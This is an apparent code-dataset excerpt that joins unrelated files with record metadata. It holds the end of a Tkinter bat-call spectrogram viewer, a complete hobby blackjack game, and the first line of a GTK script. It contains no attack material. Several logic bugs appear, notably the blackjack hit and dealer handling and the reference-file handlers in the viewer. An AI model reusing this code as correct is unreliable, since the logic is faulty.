self._button_frame = ButtonFrame(self, self._dc.breadcrumb_service, self, self._dc, program_directory,\n is_reference)\n self._button_frame.grid(row=1, column=col, columnspan=3, pady=(0, 0), sticky='we', padx=pad)\n initial_cursor_mode = self._button_frame.get_cursor_mode()\n\n self._amplitude_frame = AmplitudeGraphFrame(self, root, pipelines.amplitude, self._dc, self._settings,\n is_reference=is_reference)\n self._amplitude_frame.grid(row=2, column=col, sticky='nesw', padx=pad)\n\n self._spectrogram_frame = SpectrogramGraphFrame(self, root, pipelines.spectrogram, self._dc, self._settings,\n initial_cursor_mode, is_reference=is_reference)\n self._spectrogram_frame.grid(row=3, column=col, sticky='nesw', padx=pad)\n\n # Set up two-way communications between the scroll bar and the graph frame.\n # Set repeatdelay=0 to disable repeating, which behaves oddly.\n self._time_scroller = tk.Scrollbar(self, orient='horizontal', jump=True, repeatdelay=0)\n self._spectrogram_frame.set_scroller_t(self._time_scroller)\n self._time_scroller.grid(row=4, column=col, sticky=\"ew\", padx=pad)\n\n self._readout_frame = ReadoutFrame(self)\n self._readout_frame.grid(row=6, column=col, pady=pad, sticky='we')\n\n col = 1\n self._profile_frame = ProfileGraphFrame(self, root, pipelines.profile, self._dc, self._settings, is_reference=is_reference)\n self._profile_frame.grid(row=3, column=col, sticky='ns')\n\n col = 2\n frequency_scroller = tk.Scrollbar(self, orient='vertical', jump=True, repeatdelay=0)\n frequency_scroller.grid(row=3, column=col, sticky=\"ns\")\n self._spectrogram_frame.set_scroller_f(frequency_scroller)\n\n self.rowconfigure(0, weight=0)\n self.rowconfigure(1, weight=0)\n self.rowconfigure(2, weight=0)\n self.rowconfigure(3, weight=1)\n self.rowconfigure(4, weight=0)\n self.columnconfigure(0, weight=1)\n self.columnconfigure(1, weight=0)\n self.columnconfigure(2, weight=0)\n\n # The profile is initially absent, to avoid an annoying flicker on startup:\n self._profile_frame.grid_remove()\n\n # Tell the spectrogram framehow it can control its histogram:\n self._spectrogram_frame.set_histogram_interface(self._settings_frame.get_histogram_interface())\n\n self._frames = [self._amplitude_frame, self._spectrogram_frame, self._profile_frame,\n self._button_frame, self._fileinfo_frame, self._readout_frame]\n\n def get_settings_button(self) -> SettingsButton:\n return self._readout_frame.get_settings_button()\n\n def on_user_applied_settings(self, draw_scope: int):\n \"\"\"The user change the settings - refresh the display accordingly.\"\"\"\n self.on_rescale_handler(self._settings.time_range, self._settings.frequency_range, draw_scope=draw_scope)\n\n def update_readout_coords(self, p_axis, p_data_area):\n # Use the data area coordinates to get a data value (power) from the pipeline's\n # zoomed data, which maps to data area pixels:\n power = None\n if p_data_area:\n power = self._pipelines.spectrogram.data_area_to_value(p_data_area)\n self._readout_frame.update_readout_coords(p_axis, power)\n\n def update_readout_params(self, params: GraphParams):\n self._readout_frame.update_graph_parameters(params)\n\n def on_rescale_handler(self, time_range: AxisRange, frequency_range: AxisRange,\n add_breadcrumb=True, draw_scope: int = DrawableFrame.DRAW_ALL):\n \"\"\"Do a graph rescale triggered from the UI.\"\"\"\n\n # Clip the requested ranges to the limits from the data file:\n af_data = self._dc.get_afs_data()\n if af_data:\n time_range = self._clip_to_file_data_range(time_range, af_data.time_range, 
self._dc.time_range)\n frequency_range = self._clip_to_file_data_range(frequency_range, af_data.frequency_range,\n self._dc.frequency_range)\n\n self._dc.time_range, self._dc.frequency_range = time_range, frequency_range\n if add_breadcrumb:\n self._dc.push_breadcrumb()\n\n self.draw(draw_scope)\n\n def on_scroll_handler(self, delta_t: float, delta_f: float,\n range_t: AxisRange, range_f: AxisRange, add_breadcrumb=True):\n \"\"\"\n Scroll time and/or frequency in response to the UI, maintaining the range, and limiting\n to the range of available data. The deltas must be less than the current axis ranges.\n \"\"\"\n\n # Limit the the deltas to the range of the available data, maintaining the span of each axis,\n # and assuming (1) the existing range is valid (2) the deltas are less than the current axis ranges.\n af_data = self._dc.get_afs_data()\n if af_data:\n time_min, time_max = af_data.time_range.get_tuple()\n if delta_t > 0:\n if range_t.max + delta_t > time_max:\n delta_t = time_max - range_t.max\n else:\n if range_t.min + delta_t < time_min:\n delta_t = -(range_t.min - time_min)\n\n freq_min, freq_max = af_data.frequency_range.get_tuple()\n if delta_f > 0:\n if range_f.max + delta_f > freq_max:\n delta_f = freq_max - range_f.max\n else:\n if range_f.min + delta_f < freq_min:\n delta_f = -(range_f.min - freq_min)\n\n limited_range_t = AxisRange(range_t.min + delta_t, range_t.max + delta_t)\n limited_range_f = AxisRange(range_f.min + delta_f, range_f.max + delta_f)\n\n self.on_rescale_handler(limited_range_t, limited_range_f,\n add_breadcrumb=add_breadcrumb,\n draw_scope=DrawableFrame.DRAW_ALL)\n\n def draw(self, draw_scope: int = DrawableFrame.DRAW_ALL):\n # Update the settings to match the *actual* new axis ranges:\n self._settings.time_range = self._dc.time_range\n self._settings.frequency_range = self._dc.frequency_range\n self._settings.on_app_modified_settings()\n\n # Show or hide the profile graph as required:\n if self._settings.show_profile:\n self._profile_frame.grid()\n else:\n self._profile_frame.grid_remove()\n\n # Tell each frame to redraw themselves:\n for f in self._frames:\n if f:\n f.reset_draw(draw_scope)\n for f in self._frames:\n if f:\n f.draw(draw_scope)\n\n @staticmethod\n def _clip_to_file_data_range(r_in: AxisRange, r_permitted, r_default):\n in_min, in_max = r_in.get_tuple()\n permitted_min, permitted_max = r_permitted.get_tuple()\n out_min = max(in_min, permitted_min)\n out_max = min(in_max, permitted_max)\n # sanity:\n if out_min >= out_max:\n out_min, out_max = r_default\n return AxisRange(out_min, out_max)\n\n def on_home_button(self):\n # We add an initial breadcrumb for home.\n myaf = self._dc.afs\n if myaf:\n # If there is a file, home takes us to the file limits:\n fdata = myaf.get_rendering_data()\n self.on_rescale_handler(fdata.time_range, fdata.frequency_range, add_breadcrumb=True)\n else:\n # Otherwise, home to the default ranges.\n self.on_rescale_handler(DataContext.DEFAULT_TIME_RANGE, DataContext.DEFAULT_FREQUENCY_RANGE,\n add_breadcrumb=True)\n\n def on_navigation_button(self, breadcrumb: Breadcrumb):\n self._dc.time_range = breadcrumb.time_range\n self._dc.frequency_range = breadcrumb.frequency_range\n # Don't add a breadcrumb when we navigate based on breadcrumbs:\n self.on_rescale_handler(breadcrumb.time_range, breadcrumb.frequency_range, add_breadcrumb=False)\n\n def on_cursor_mode(self, mode):\n self._spectrogram_frame.set_cursor_mode(mode)\n\n def set_sync_source(self, sync_source):\n \"\"\"Notify this panel that there is a sync source 
it can use, or None if\n there isn't\"\"\"\n return self._button_frame.set_sync_source(sync_source)\n\n def get_sync_data(self):\n \"\"\"This panel is being requests for sync data\"\"\"\n return self._dc.time_range, self._dc.frequency_range, self._spectrogram_frame.get_canvas_size()\n\n def apply_sync_data(self, sync_data):\n \"\"\"Sync the ranges of this panel to those supplied.\"\"\"\n time_range, frequency_range, other_canvas_size = sync_data\n this_canvas_width, _ = self._spectrogram_frame.get_canvas_size()\n other_canvas_width, _ = other_canvas_size\n\n # Apply the frequency range directly, and centre the time range on the current\n # time range's centre:\n t1, t2 = self._dc.time_range.get_tuple()\n new_t1, new_t2 = time_range.get_tuple()\n existing_centre = (t1 + t2) / 2\n new_half_span = (new_t2 - new_t1) / 2\n # Scale the half span by ratio of canvas widths so the on-screen scaling is the same:\n new_half_span *= this_canvas_width / other_canvas_width\n centred_time_range = AxisRange(existing_centre - new_half_span, existing_centre + new_half_span)\n self.on_rescale_handler(centred_time_range, frequency_range, add_breadcrumb=True)\n\n def get_screen_factors(self) -> Tuple[float, float]:\n # Calculate the screen aspect factor based on the spectrogram graph,\n # that will be used in adaptive window length calculations.\n return self._spectrogram_frame.calculate_screen_factors()\n\n def on_left_key(self, event):\n self._spectrogram_frame.tview(tk.SCROLL, -1, tk.UNITS)\n\n def on_shift_left_key(self, event):\n self._spectrogram_frame.tview(tk.SCROLL, -1, tk.PAGES)\n\n def on_right_key(self, event):\n self._spectrogram_frame.tview(tk.SCROLL, 1, tk.UNITS)\n\n def on_shift_right_key(self, event):\n self._spectrogram_frame.tview(tk.SCROLL, 1, tk.PAGES)\n\n def on_up_key(self, event):\n self._spectrogram_frame.set_preset_time_range(-1)\n\n def on_shift_up_key(self, event):\n pass\n\n def on_down_key(self, event):\n self._spectrogram_frame.set_preset_time_range(+1)\n\n def on_shift_down_key(self, event):\n pass\n\n def on_page_up_key(self, event):\n self._spectrogram_frame.fview(tk.SCROLL, -1, tk.UNITS)\n\n def on_shift_page_up_key(self, event):\n self._spectrogram_frame.fview(tk.SCROLL, -1, tk.PAGES)\n\n def on_page_down_key(self, event):\n self._spectrogram_frame.fview(tk.SCROLL, 1, tk.UNITS)\n\n def on_shift_page_down_key(self, event):\n self._spectrogram_frame.fview(tk.SCROLL, 1, tk.PAGES)\n\n def on_home_key(self, event):\n self.on_home_button()\n\n\nclass DataContext:\n \"\"\"This class contains data used by a graph pane, including raw file data and axis ranges.\"\"\"\n\n DEFAULT_TIME_RANGE = AxisRange(rmin=0, rmax=30)\n DEFAULT_FREQUENCY_RANGE = AxisRange(rmin=0, rmax=192000)\n DEFAULT_AMPLITUDE_RANGE = AxisRange(rmin=-1, rmax=1)\n\n def __init__(self):\n self.afs: Optional[AudioFileService] = None\n self.breadcrumb_service = BreadcrumbService()\n self.time_range: Optional[AxisRange] = None\n self.frequency_range: Optional[AxisRange] = None\n self.amplitude_range: Optional[AxisRange] = None\n self.reset()\n\n def reset(self):\n self._set_afs(None)\n self.time_range = self.DEFAULT_TIME_RANGE\n self.frequency_range = self.DEFAULT_FREQUENCY_RANGE\n self.amplitude_range = self.DEFAULT_AMPLITUDE_RANGE\n\n def _set_afs(self, afs: Optional[AudioFileService]):\n # If we already have an afs, close it:\n if self.afs is not None:\n self.afs.close()\n self.afs = afs\n\n def get_ranges(self):\n return self.time_range, self.frequency_range, self.amplitude_range\n\n def get_afs(self) -> 
Optional[AudioFileService]:\n        return self.afs\n\n    def get_afs_data(self) -> Optional[AudioFileService.RenderingData]:\n        return self.afs.get_rendering_data() if self.afs is not None else None\n\n    def update_from_af(self, afs: AudioFileService):\n        self._set_afs(afs)\n        af_data = afs.get_rendering_data()\n        self.amplitude_range = af_data.amplitude_range\n        self.time_range = af_data.time_range\n        self.frequency_range = af_data.frequency_range\n\n    def push_breadcrumb(self):\n        self.breadcrumb_service.push_entry(\n            Breadcrumb(time_range=self.time_range, frequency_range=self.frequency_range, timestamp=timer()))\n\n    def on_data_change(self):\n        self.breadcrumb_service.reset()\n        self.push_breadcrumb()\n\n\nclass RootWindow(tk.Tk):\n    \"\"\"The top level application window.\"\"\"\n\n    def __init__(self, *args, initialfile=None, **kwargs):\n        super().__init__(*args, **kwargs)\n\n        self._paned_window: tk.PanedWindow\n\n        self._main_pipelines = GraphPipelines(None, None, None)\n        self._dc_main: DataContext = DataContext()\n        self._main_historian = HistorianService()\n        self._main_settings = GraphSettings(self._on_app_modified_main_settings, self.on_user_applied_main_settings)\n        self._main_settings.show_profile = True\n\n        self._ref_pipelines = GraphPipelines(None, None, None)\n        self._dc_ref: DataContext = DataContext()\n        self._ref_historian = HistorianService()\n        self._ref_settings = GraphSettings(self._on_app_modified_ref_settings, self.on_user_applied_ref_settings)\n        self._ref_settings.show_profile = False\n\n        self._menu_recent_main = None\n        self._menu_recent_ref = None\n        self._menu_analysis = None\n        self._menu_image = None\n        self._menu_edit = None\n        self._menu_file = None\n        self._first_file_open = True # Track whether this is the first time the user has opened a file.\n\n        appsettings.instance.read()\n        self._apply_settings()\n\n        # Keep track of what cursors have been set:\n        self._cursor_stack = []\n        self._push_cursor()\n\n        self.title(PROGRAM_NAME)\n\n        # Define the initial window position and size:\n        self.geometry(\"900x700+100+100\")\n        self.iconphoto(True, tk.PhotoImage(file=get_asset_path(\"batogram.png\")))\n\n        self.protocol(\"WM_DELETE_WINDOW\", self.exit)\n\n        # Kick off all the rendering pipelines:\n        self._start_pipelines()\n\n        self._create_menus()\n        self._create_widgets()\n\n        self.bind(DATA_CHANGE_MAIN_EVENT, self._on_data_change_main)\n        self.bind(DATA_CHANGE_REF_EVENT, self._on_data_change_ref)\n\n        self.bind('<Left>', self._main_pane.on_left_key)\n        self.bind('<Shift-Left>', self._main_pane.on_shift_left_key)\n        self.bind('<Right>', self._main_pane.on_right_key)\n        self.bind('<Shift-Right>', self._main_pane.on_shift_right_key)\n        self.bind('<Up>', self._main_pane.on_up_key)\n        self.bind('<Shift-Up>', self._main_pane.on_shift_up_key)\n        self.bind('<Down>', self._main_pane.on_down_key)\n        self.bind('<Shift-Down>', self._main_pane.on_shift_down_key)\n        self.bind('<Prior>', self._main_pane.on_page_up_key)\n        self.bind('<Shift-Prior>', self._main_pane.on_shift_page_up_key)\n        self.bind('<Next>', self._main_pane.on_page_down_key)\n        self.bind('<Shift-Next>', self._main_pane.on_shift_page_down_key)\n        self.bind('<Home>', self._main_pane.on_home_key)\n\n        # Allow tk to work out the size of things before we try to draw any graphs:\n        self.update_idletasks()\n\n        self._main_pane.draw()\n        self._ref_pane.draw()\n\n        if initialfile is not None:\n            self.after_idle(lambda: self._do_open_main_file(initialfile))\n\n    def _start_pipelines(self):\n        # Kick off the spectrogram rendering pipelines. 
This has to be done at this level because\n        # the pipelines share some steps for efficiency, to avoid repeated expensive calculations.\n        main_spectrogram_step = SpectrogramFftStep(self._main_settings)\n        main_data_reader_step = SpectrogramDataReaderStep(self._main_settings)\n        self._main_pipelines = GraphPipelines(\n            AmplitudePipeline(self._main_settings, main_data_reader_step),\n            SpectrogramPipeline(self._main_settings, main_spectrogram_step, main_data_reader_step),\n            ProfilePipeline(self._main_settings, main_spectrogram_step, main_data_reader_step))\n\n        ref_spectrogram_step = SpectrogramFftStep(self._ref_settings)\n        ref_data_reader_step = SpectrogramDataReaderStep(self._ref_settings)\n        self._ref_pipelines = GraphPipelines(\n            AmplitudePipeline(self._ref_settings, ref_data_reader_step),\n            SpectrogramPipeline(self._ref_settings, ref_spectrogram_step, ref_data_reader_step),\n            ProfilePipeline(self._ref_settings, ref_spectrogram_step, ref_data_reader_step))\n\n    def _create_widgets(self):\n        pad = 5\n        self._paned_window = tk.PanedWindow(self, orient=tk.HORIZONTAL, showhandle=True, sashcursor=\"sb_h_double_arrow\",\n                                            sashrelief=tk.GROOVE)\n\n        bottom = self._create_bottom_panel(self, pad)\n        bottom.grid(row=1, column=0)\n\n        # Create the settings frames first so they can be passed as parameters\n        # to other frames below:\n\n        self._ref_pane = PanelFrame(\n            self._paned_window, self, self._ref_pipelines, self._dc_ref, self._ref_settings,\n            self._ref_settings_frame, pad, is_reference=True)\n        self._ref_pane.pack(side=tk.LEFT)\n\n        self._main_pane = PanelFrame(\n            self._paned_window, self, self._main_pipelines, self._dc_main, self._main_settings,\n            self._main_settings_frame, pad, is_reference=False)\n        self._main_pane.pack(side=tk.RIGHT)\n\n        SettingsButtonsController(bottom,\n                                  self._main_pane.get_settings_button(), self._main_settings_frame,\n                                  self._ref_pane.get_settings_button(), self._ref_settings_frame)\n\n        # Assemble the panel window:\n        self._paned_window.add(self._ref_pane)\n        self._paned_window.add(self._main_pane)\n        self._paned_window.grid(row=0, column=0, sticky=\"nsew\")\n\n        self.rowconfigure(0, weight=1)\n        self.rowconfigure(1, weight=0)\n        self.columnconfigure(0, weight=1)\n\n        # This code annoyingly jumps on startup. I can't find a simple way to avoid that right now.\n        # Maybe we should make the frame invisible? 
I don't know if that would work.\n        self.update()  # Need to do this before we can place the sash.\n        sash_pixels = 0\n        self._paned_window.sash_place(0, sash_pixels, 0)\n\n    def _create_bottom_panel(self, parent, pad):\n\n        frame = tk.Frame(parent)\n        self._ref_settings_frame = MoreTopFrame(frame, self._ref_settings, pad)\n        self._ref_settings_frame.grid(row=0, column=0)\n        self._main_settings_frame = MoreTopFrame(frame, self._main_settings, pad)\n        self._main_settings_frame.grid(row=1, column=0)\n\n        return frame\n\n    def _create_menus(self):\n        # Set up the menus (see https://tkdocs.com/tutorial/menus.html):\n        self.option_add('*tearOff', False)\n        menubar = tk.Menu(self)\n        self['menu'] = menubar\n\n        self._menu_file = tk.Menu(menubar)\n        menubar.add_cascade(menu=self._menu_file, label=MENU_TEXT_FILE, underline=0)\n        self._menu_file.add_command(label=MENU_TEXT_OPEN_MAIN, command=self._open_main_file, underline=0)\n        self._menu_file.entryconfigure(MENU_TEXT_OPEN_MAIN, accelerator='Ctrl+O')\n        self.bind(\"<Control-o>\", self._open_main_file_event)\n        self._menu_recent_main = tk.Menu(self._menu_file)\n        self._menu_file.add_cascade(menu=self._menu_recent_main, label=MENU_TEXT_OPEN_RECENT_MAIN)\n        self._populate_file_history(self._menu_recent_main, self._main_historian, self._do_open_main_file)\n        self._menu_file.add_command(label=MENU_TEXT_CLOSE_MAIN, command=self._close_main_file_event, underline=0)\n        self._menu_file.add_separator()\n\n        self._menu_file.add_command(label=MENU_TEXT_OPEN_REF, command=self._open_ref_file, underline=5)\n        self._menu_file.entryconfigure(MENU_TEXT_OPEN_REF, accelerator='Ctrl+R')\n        self.bind(\"<Control-r>\", self._open_ref_file_event)\n        self._menu_recent_ref = tk.Menu(self._menu_file)\n        self._menu_file.add_cascade(menu=self._menu_recent_ref, label=MENU_TEXT_OPEN_RECENT_REF)\n        self._populate_file_history(self._menu_recent_ref, self._ref_historian, self._do_open_ref_file)\n        self._menu_file.add_command(label=MENU_TEXT_CLOSE_REF, command=self.close_ref_file_event)\n        self._menu_file.add_separator()\n\n        # self._menu_file.add_command(label=MENU_TEXT_SAVE, command=self.save_files_as)\n        # self._menu_file.add_separator()\n        self._menu_file.add_command(label=MENU_TEXT_EXIT, command=self.exit, underline=1)\n        self._menu_file.entryconfigure(MENU_TEXT_EXIT, accelerator='Ctrl+X')\n        self.bind(\"<Control-x>\", self.exit_event)\n\n        menubar.add_command(label=MENU_TEXT_SETTINGS, command=self._show_settings, underline=0)\n\n        menubar.add_command(label=MENU_TEXT_ABOUT, command=self._show_about)\n\n        self.enable_menu_items()\n\n    @staticmethod\n    def _populate_file_history(parent_menu_item, historian, method):\n        parent_menu_item.delete(0, \"end\")\n        for basename, file_path in historian.get_history():\n            parent_menu_item.add_command(label=basename,\n                                         command=lambda f=file_path: method(f))\n\n    def enable_menu_items(self):\n        # self._menu_file.entryconfigure(MENU_TEXT_SAVE, state=tk.DISABLED)\n        self._menu_file.entryconfigure(MENU_TEXT_OPEN_RECENT_MAIN,\n                                       state=tk.DISABLED if self._main_historian.is_empty() else tk.NORMAL)\n        self._menu_file.entryconfigure(MENU_TEXT_OPEN_RECENT_REF,\n                                       state=tk.DISABLED if self._ref_historian.is_empty() else tk.NORMAL)\n\n    def _pop_cursor(self):\n        try:\n            self._cursor_stack.pop()\n            cursor_name = self._cursor_stack[-1]\n        except IndexError as e:\n            print(\"Warning - couldn't pop the cursor: {}\".format(e))\n            self.config(cursor=\"\")\n        else:\n            self.config(cursor=cursor_name)\n\n    def _push_cursor(self, cursor_name=\"\"):\n        self._cursor_stack.append(cursor_name)\n        self.config(cursor=cursor_name)\n        self.update()\n\n    filetypes = (\n        
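# Listing both extension cases presumably keeps the dialog matching files on\n        # case-sensitive filesystems; this tuple feeds askopenfilename below.\n        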
('audio files', '*.wav *.WAV'),\n ('All files', '*.*')\n )\n\n def _open_main_file_event(self, _):\n self._open_main_file()\n\n def _open_file_dialog(self, title: str) -> str:\n initialdir = None\n if self._first_file_open:\n self._first_file_open = False\n # Only do this the first time a file is opened; thereafter, the dialog\n # remembers where the user last navigated it to:\n initialdir = appsettings.instance.data_directory\n\n filepath: str = tk.filedialog.askopenfilename(title=title, filetypes=self.filetypes,\n initialdir=initialdir)\n return filepath\n\n def _open_main_file(self):\n filepath = self._open_file_dialog(\"Open an audio file\")\n if filepath:\n self._do_open_main_file(filepath)\n\n def _open_ref_file_event(self, _):\n self._open_ref_file()\n\n def _open_ref_file(self):\n filepath = self._open_file_dialog(\"Open a reference audio file\")\n if filepath:\n self._do_open_ref_file(filepath)\n\n def _do_open_main_file(self, filepath):\n myaf = self._do_open_file(filepath, self._menu_recent_main, self._do_open_main_file, self._main_historian)\n if myaf is not None:\n self._dc_main.update_from_af(myaf)\n self._main_settings_frame.copy_settings_to_widgets() # The axis ranges have changed\n self._main_settings_frame.set_guano_data(myaf.get_guano_data())\n self._main_settings.on_open_new_file()\n self.event_generate(DATA_CHANGE_MAIN_EVENT)\n\n def _do_open_ref_file(self, filepath):\n myaf = self._do_open_file(filepath, self._menu_recent_ref, self._do_open_ref_file, self._ref_historian)\n if myaf is not None:\n self._dc_ref.update_from_af(myaf)\n self._ref_settings_frame.copy_settings_to_widgets() # The axis ranges have changed\n self._ref_settings_frame.set_guano_data(myaf.get_guano_data())\n self._main_settings.on_open_new_file()\n # Make sure the ref pane is visible:\n x, y = self._paned_window.sash_coord(0)\n if x < 10:\n self._paned_window.sash_place(0, 300, y)\n self.event_generate(DATA_CHANGE_REF_EVENT)\n\n def _do_open_file(self, filepath, recent_menu_item, method, historian):\n self._push_cursor(\"watch\") # A large file might take time to load. 
Though, it seems not.\n try:\n # Attempt to read the wav file provided:\n af_this = af.AudioFileService(filepath)\n af_this.open()\n except (FileNotFoundError, WavFileError) as e:\n tk.messagebox.showerror(PROGRAM_NAME, \"Error reading audio file: {}\".format(e))\n return None\n else:\n self._main_historian.add_file(filepath)\n self._populate_file_history(recent_menu_item, historian, method)\n return af_this\n finally:\n self._pop_cursor()\n\n def _close_main_file_event(self):\n self._dc_main.reset()\n self._main_settings_frame.set_guano_data(None)\n self.event_generate(DATA_CHANGE_MAIN_EVENT)\n\n def close_ref_file_event(self):\n self._dc_ref.reset()\n self._main_settings_frame.set_guano_data(None)\n self.event_generate(DATA_CHANGE_REF_EVENT)\n\n def exit_event(self, _):\n self.exit()\n\n def exit(self):\n if (tk.messagebox.askokcancel(\n message='Are you sure you want to exit {}?'.format(PROGRAM_NAME),\n icon='question', title='Exit')):\n for p in chain(self._main_pipelines, self._ref_pipelines):\n if p:\n p.shutdown()\n\n appsettings.instance.write()\n\n self.destroy()\n\n def _on_data_change_main(self, _):\n self._dc_main.on_data_change()\n self._main_pane.draw()\n # Tell the other pane we can accept sync requests (as we have some data):\n sync_source = self._main_pane if self._dc_main.afs else None\n self._ref_pane.set_sync_source(sync_source)\n\n def _on_data_change_ref(self, _):\n self._dc_ref.on_data_change()\n self._ref_pane.draw()\n # Tell the other pane we can accept sync requests (as we have some data):\n sync_source = self._ref_pane if self._dc_ref.afs else None\n self._main_pane.set_sync_source(sync_source)\n\n @staticmethod\n def _pipeline_error_handler(e):\n tk.messagebox.showerror(PROGRAM_NAME, \"Error encountered in processing pipeline: {}\".format(e))\n raise e\n\n def _on_app_modified_main_settings(self, draw_scope: int = DrawableFrame.DRAW_ALL):\n # This gets called from the graph pane when the user changes settings\n # such as graph scaling.\n self._main_settings_frame.copy_settings_to_widgets()\n\n def on_user_applied_main_settings(self, draw_scope: int = DrawableFrame.DRAW_ALL):\n # New settings values are available to be applied to the application.\n self._main_pane.on_user_applied_settings(draw_scope)\n\n def _on_app_modified_ref_settings(self, draw_scope: int = DrawableFrame.DRAW_ALL):\n # This gets called from the graph pane when the user changes settings\n # such as graph scaling.\n self._ref_settings_frame.copy_settings_to_widgets()\n\n def on_user_applied_ref_settings(self, draw_scope: int = DrawableFrame.DRAW_ALL):\n # New settings values are available to be applied to the application.\n self._ref_pane.on_user_applied_settings(draw_scope)\n\n def _show_about(self):\n window = AboutWindow(self)\n window.grab_set()\n window.wait_window()\n\n def _show_settings(self):\n previous_data_directory = appsettings.instance.data_directory\n modal = AppSettingsWindow(self, appsettings.instance, lambda: self._on_settings_ok(previous_data_directory))\n modal.grab_set()\n modal.wait_window()\n\n def _on_settings_ok(self, previous_data_directory: str):\n # Refresh some things from the updated settings values:\n if previous_data_directory != appsettings.instance.data_directory:\n # Force the new data directory to be used when next opening the a file:\n self._first_file_open = True\n self._apply_settings()\n self._main_pane.draw()\n self._ref_pane.draw()\n\n @staticmethod\n def _apply_settings():\n # Refresh some things from the updated settings values:\n cmap_file = 
COLOUR_MAPS[appsettings.instance.colour_map]\n colourmap.instance.reload_map(cmap_file)\n","repo_name":"jmears63/batogram","sub_path":"batogram/rootwindow.py","file_name":"rootwindow.py","file_ext":"py","file_size_in_byte":34450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2948080419","text":"import random\r\nimport sys\r\n#from tkinter import *\r\n\r\n\r\nprint(\"Welcome to Python Blackjack!\")\r\n\r\ncards = ['2', '2', '2', '2',\r\n '3', '3', '3', '3',\r\n '4', '4', '4', '4',\r\n '5', '5', '5', '5',\r\n '6', '6', '6', '6',\r\n '7', '7', '7', '7',\r\n '8', '8', '8', '8',\r\n '9', '9', '9', '9',\r\n '10', '10', '10', '10',\r\n '10', '10', '10', '10',\r\n '10', '10', '10', '10',\r\n '10', '10', '10', '10',\r\n 'Ace', 'Ace', 'Ace', 'Ace']\r\n\r\n\r\ndef dealer_hand() -> list:\r\n print()\r\n print(\"Dealer's hand:\")\r\n print('-------------')\r\n return deal_cards()\r\n\r\n \r\n \r\n\r\ndef player_hand() -> list:\r\n print()\r\n print(\"Player's hand:\")\r\n print('-------------')\r\n return deal_cards()\r\n \r\n \r\n\r\n \r\ndef deal_cards() -> list:\r\n temp = []\r\n hand = []\r\n print()\r\n print(\"*Dealt hand*\")\r\n for i in range(2):\r\n cards_dealt = random.choice(cards)\r\n print( cards_dealt)\r\n temp.append(cards_dealt)\r\n cards.remove(cards_dealt)\r\n print()\r\n print(\"*Current hand*\")\r\n for card in temp:\r\n if card == 'Ace':\r\n value = int(input(\"Ace = 1 or 11? \"))\r\n if value == 1:\r\n hand.append(1)\r\n if value == 11:\r\n hand.append(11) \r\n else:\r\n hand.append(int(card))\r\n \r\n for card in hand:\r\n print( card)\r\n \r\n return hand\r\n\r\n\r\n\r\n\r\ndef total(L) -> int:\r\n total = 0\r\n for card in L:\r\n total += card\r\n\r\n print()\r\n print(\"Total hand value:\")\r\n print( total)\r\n\r\n if total == 21:\r\n print(\"Blackjack!\")\r\n sys.exit()\r\n else:\r\n pass\r\n \r\n return total\r\n\r\n\r\n\r\n\r\ndef hit_player():\r\n global final\r\n final = 0\r\n print(\"Player's Turn\")\r\n print('-------------')\r\n current_hand = player_hand() #list\r\n hand_total = total(current_hand) #int\r\n print()\r\n while True: \r\n ask = input(\"Hit or stand? \")\r\n if ask == \"hit\":\r\n new_card = random.choice(cards)\r\n if new_card == \"Ace\":\r\n value = int(input(\"Ace = 1 or 11? \"))\r\n if value == 1:\r\n current_hand.append(1)\r\n hand_total += 1\r\n if value == 11:\r\n current_hand.append(11)\r\n hand_total += 11\r\n else:\r\n current_hand.append(new_card)\r\n hand_total += int(new_card)\r\n \r\n for card in current_hand:\r\n print( card)\r\n print(\"Total hand value:\")\r\n print( hand_total)\r\n\r\n\r\n if hand_total == 21: \r\n print(\"Blackjack! Player wins!\")\r\n sys.exit()\r\n else:\r\n pass\r\n \r\n \r\n if hand_total > 21:\r\n print()\r\n print(\"Busted!\")\r\n print(\"Dealer wins!\")\r\n sys.exit()\r\n else:\r\n continue\r\n\r\n \r\n elif ask == \"stand\":\r\n final += hand_total\r\n hit_dealer()\r\n \r\n\r\ndef hit_dealer():\r\n print(\"Dealer's Turn\")\r\n print('-------------')\r\n current_hand2 = dealer_hand() #list\r\n hand_total2 = total(current_hand2) #int\r\n print()\r\n while True:\r\n ask2 = input(\"Hit or stand? \")\r\n if ask2 == \"hit\":\r\n if hand_total2 < 17:\r\n new_card2 = random.choice(cards)\r\n if new_card2 == \"Ace\":\r\n value2 = int(input(\"Ace = 1 or 11? 
\"))\r\n if value2 == 1:\r\n current_hand2.append(1)\r\n hand_total2 += 1\r\n if value2 == 11:\r\n current_hand2.append(11)\r\n hand_total2 += 11\r\n else:\r\n current_hand2.append(new_card2)\r\n hand_total2 += int(new_card2)\r\n else:\r\n print(\"Dealer has reached 17 points\")\r\n hit_player()\r\n\r\n for card in current_hand2:\r\n print(card)\r\n print(\"Total hand value:\")\r\n print( hand_total2)\r\n\r\n\r\n if hand_total2 == 21: \r\n print(\"Blackjack! Dealer wins!\")\r\n sys.exit()\r\n else:\r\n pass\r\n \r\n\r\n if hand_total2 > 21:\r\n print()\r\n print(\"Busted!\")\r\n print(\"Dealer loses! Player wins!\")\r\n sys.exit()\r\n else:\r\n continue\r\n \r\n \r\n elif ask2 == \"stand\":\r\n if final == hand_total2:\r\n print(\"Push\")\r\n sys.exit()\r\n if final < hand_total2:\r\n print(\"Dealer wins!\")\r\n sys.exit()\r\n if final > hand_total2:\r\n print(\"Player wins!\")\r\n sys.exit()\r\n\r\n\r\n\r\n##\r\n##window = Tk()\r\n##window.title(\"Blackjack\")\r\n##window.configure(background = 'sea green')\r\n##\r\n##input = Entry(window, width = 5, font = (\"Comic Sans MS\", 20))\r\n##input.pack()\r\n##\r\n##label_for_hit = Label(window, fg = 'white', bg = 'sea green', text = 'Welcome to Python Blackjack!', font = (\"Comic Sans MS\", 15))\r\n##label_for_hit.pack()\r\n##\r\n##player = Label(window, bg = 'white', fg = 'black')\r\n##player.pack()\r\n##\r\n##\r\n##start = Button(window, fg = 'white', bg = 'sea green', text = 'Start', font = (\"Comic Sans MS\", 15), command = hit_player)\r\n##start.pack(side = BOTTOM)\r\n##\r\n##\r\n##window.mainloop()\r\n\r\n \r\nif __name__ == '__main__':\r\n hit_player()\r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Mjain10/BlackJack","sub_path":"blackjack.py","file_name":"blackjack.py","file_ext":"py","file_size_in_byte":5742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28797301860","text":"#!/usr/bin/env python\n\nimport gtk\nimport 